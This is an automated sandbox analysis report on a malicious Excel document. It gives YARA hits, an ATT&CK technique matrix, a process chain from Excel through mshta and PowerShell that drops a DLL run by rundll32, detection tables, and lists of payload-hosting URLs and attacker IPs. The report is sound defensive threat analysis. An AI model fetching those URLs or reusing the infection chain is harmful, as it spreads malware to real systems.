                            Source: Yara matchFile source: 12.2.rundll32.exe.8b0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.e50000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.c20000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.810000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.730000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2900000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.8e0000.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.600000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2900000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.370000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2fc0000.24.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.860000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2800000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.29a0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.ce0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.880000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.27d0000.9.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e40000.20.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2800000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.27d0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2fc0000.24.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e90000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2b00000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.28d0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d50000.17.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2a90000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.28d0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e40000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2eb0000.21.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d80000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.700000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.830000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d10000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2730000.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.3030000.25.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.810000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2cf0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.3060000.26.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.7d0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2830000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d50000.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2b60000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.27a0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2b30000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2830000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2a10000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.26d0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.700000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2400000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.26a0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.ce0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.27a0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d10000.16.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.8e0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2ee0000.22.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2400000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.10000000.31.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2db0000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000011.00000002.664811796.0000000002D81000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510464737.0000000002CF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559443936.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510287777.00000000026A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665343860.0000000003091000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559926602.0000000000E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559812770.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664505889.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.562101992.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510322311.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664861198.0000000002DB0000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664965956.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664542338.0000000002B61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560189924.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559719503.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510432409.0000000002830000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.663059849.0000000000270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510167906.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665031499.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510522270.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.443244837.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.668746611.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.516180172.0000000000601000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560022976.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.663136022.0000000000370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664371125.0000000002A11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.515850446.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664216814.0000000002800000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665264578.0000000003031000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560265506.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510145612.00000000008B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.663107682.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.509996233.0000000000700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559589643.0000000000291000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560140675.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664407337.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560066037.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664117517.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664190998.00000000027D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559766532.0000000000C21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510607759.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510494175.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664248445.0000000002881000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665204361.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664471765.0000000002B01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665308751.0000000003061000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510409215.0000000002801000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664297781.0000000002900000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.663687755.0000000000831000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510379453.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.562204420.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664663684.0000000002D10000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.663778840.0000000000860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664161641.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510352151.0000000002761000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665168076.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.516839554.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665088679.0000000002EE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510556451.0000000002E91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510119980.0000000000880000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559961394.0000000002400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.562837454.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559901253.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560096641.0000000002901000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559852842.0000000000D81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664763356.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\Milossd.dll, type: DROPPED

                            Mitre Att&ck Matrix

                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid Accounts21
                            Scripting                            		1
                            Windows Service                            		1
                            Windows Service                            		2
                            Disable or Modify Tools                            		1
                            Input Capture                            		2
                            System Time Discovery                            		Remote Services1
                            Archive Collected Data                            		Exfiltration Over Other Network Medium13
                            Ingress Tool Transfer                            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                            Default Accounts1
                            Native API                            		Boot or Logon Initialization Scripts111
                            Process Injection                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory3
                            File and Directory Discovery                            		Remote Desktop Protocol1
                            Email Collection                            		Exfiltration Over Bluetooth1
                            Encrypted Channel                            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain Accounts13
                            Exploitation for Client Execution                            		Logon Script (Windows)Logon Script (Windows)21
                            Scripting                            		Security Account Manager38
                            System Information Discovery                            		SMB/Windows Admin Shares1
                            Input Capture                            		Automated Exfiltration1
                            Non-Standard Port                            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local Accounts11
                            Command and Scripting Interpreter                            		Logon Script (Mac)Logon Script (Mac)2
                            Obfuscated Files or Information                            		NTDS21
                            Security Software Discovery                            		Distributed Component Object Model1
                            Clipboard Data                            		Scheduled Transfer2
                            Non-Application Layer Protocol                            		SIM Card SwapCarrier Billing Fraud
                            Cloud Accounts1
                            Service Execution                            		Network Logon ScriptNetwork Logon Script2
                            Masquerading                            		LSA Secrets1
                            Virtualization/Sandbox Evasion                            		SSHKeyloggingData Transfer Size Limits122
                            Application Layer Protocol                            		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable Media1
                            PowerShell                            		Rc.commonRc.common1
                            Virtualization/Sandbox Evasion                            		Cached Domain Credentials2
                            Process Discovery                            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup ItemsStartup Items111
                            Process Injection                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                            Hidden Files and Directories                            		Proc Filesystem1
                            Remote System Discovery                            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                            Rundll32                            		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562416 Sample: DOCUMENT_2801.xls Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 52 210.57.209.142 UNAIR-AS-IDUniversitasAirlanggaID Indonesia 2->52 54 118.98.72.86 TELKOMNET-AS-APPTTelekomunikasiIndonesiaID Indonesia 2->54 56 29 other IPs or domains 2->56 64 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->64 66 Multi AV Scanner detection for domain / URL 2->66 68 Found malware configuration 2->68 70 17 other signatures 2->70 15 EXCEL.EXE 53 12 2->15         started        signatures3 process4 file5 50 C:\Users\user\Desktop\DOCUMENT_2801.xls, Composite 15->50 dropped 62 Passes commands via pipe to a shell (likely to bypass AV or HIPS) 15->62 19 cmd.exe 15->19         started        signatures6 process7 process8 21 cmd.exe 19->21         started        23 cmd.exe 19->23         started        process9 25 mshta.exe 11 21->25         started        dnsIp10 58 91.240.118.172, 49165, 49166, 80 GLOBALLAYERNL unknown 25->58 28 powershell.exe 12 7 25->28         started        process11 dnsIp12 60 tamiladsense.com 136.0.111.15, 49167, 80 AS40676US United States 28->60 48 C:\ProgramData\Milossd.dll, PE32 28->48 dropped 76 Powershell drops PE file 28->76 33 cmd.exe 28->33         started        file13 signatures14 process15 process16 35 rundll32.exe 33->35         started        process17 37 rundll32.exe 1 35->37         started        file18 46 C:\Windows\...\kisyfwhhvxv.tpx (copy), PE32 37->46 dropped 72 Hides that the sample has been downloaded from the Internet (zone.identifier) 37->72 41 rundll32.exe 37->41         started        signatures19 process20 process21 43 rundll32.exe 1 41->43         started        signatures22 74 Hides that the sample has been downloaded from the Internet (zone.identifier) 43->74

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            DOCUMENT_2801.xls17%ReversingLabsDocument-Excel.Trojan.Heuristic

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\ProgramData\Milossd.dll100%Joe Sandbox ML

                            Unpacked PE Files

                            SourceDetectionScannerLabelLinkDownload
                            17.2.rundll32.exe.3090000.27.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            14.2.rundll32.exe.d80000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2760000.8.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.3c0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2a90000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.25b0000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2880000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            14.2.rundll32.exe.2e10000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.370000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.29a0000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.e50000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            16.2.rundll32.exe.200000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.2730000.7.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.270000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2f70000.23.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.7d0000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2eb0000.21.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.27d0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2db0000.19.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.e80000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            14.2.rundll32.exe.2900000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.340000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.8b0000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            11.2.rundll32.exe.1c0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.c20000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.730000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2900000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.600000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            16.2.rundll32.exe.270000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.860000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2fc0000.24.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2800000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            11.2.rundll32.exe.2b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.880000.3.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2e40000.20.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2800000.10.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.27d0000.9.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.28d0000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2b00000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2e90000.15.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2e40000.14.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2d80000.18.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.830000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2d10000.16.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.3030000.25.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.3060000.26.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.810000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.2830000.11.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.2cf0000.12.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2a10000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2d50000.17.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.27a0000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2b30000.14.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2b60000.15.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            14.2.rundll32.exe.2400000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.26d0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2ee0000.22.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.26a0000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.700000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.ce0000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.8e0000.5.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.1e0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.2db0000.13.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.290000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                            Domains

                            SourceDetectionScannerLabelLink
                            tamiladsense.com8%VirustotalBrowse

                            URLs

                            SourceDetectionScannerLabelLink
                            http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/PE3100%Avira URL Cloudmalware
                            https://vn.minin0%Avira URL Cloudsafe
                            http://engaz.shop/wp-content/MOllqUm2nb/PE3100%Avira URL Cloudmalware
                            http://ocsp.entrust.net030%URL Reputationsafe
                            https://lastregaristorante.com/w0%Avira URL Cloudsafe
                            http://91.240.118.172/ee/ss/se.htmlngs0%Avira URL Cloudsafe
                            http://engaz.shop/wp-content/MOllqUm2nb/100%Avira URL Cloudmalware
                            http://91.240.118.17f0%Avira URL Cloudsafe
                            https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/PE3100%Avira URL Cloudmalware
                            https://oculusvisioncare.com/wp-0%Avira URL Cloudsafe
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                            http://tunbridgeservices.com/jfo0%Avira URL Cloudsafe
                            http://91.240.118.172/ee/ss/se.html100%Avira URL Cloudmalware
                            http://3-fasen.com/wp-content/3Bl0hBbW/PE3100%Avira URL Cloudmalware
                            http://91.240.110%URL Reputationsafe
                            https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/100%Avira URL Cloudmalware
                            http://manchesterheatingservices.youprocontact.com/wp-admin/AiK1100%Avira URL Cloudmalware
                            https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/100%Avira URL Cloudmalware
                            http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/PE3100%Avira URL Cloudmalware
                            https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/PE3100%Avira URL Cloudmalware
                            http://tunbridgeservices.com/jfoeqhxz/zOX0/PE3100%Avira URL Cloudmalware
                            https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/PE3100%Avira URL Cloudmalware
                            https://139.196.72.155/R0%Avira URL Cloudsafe
                            http://91.240.118.172/ee/ss/se.p0%Avira URL Cloudsafe
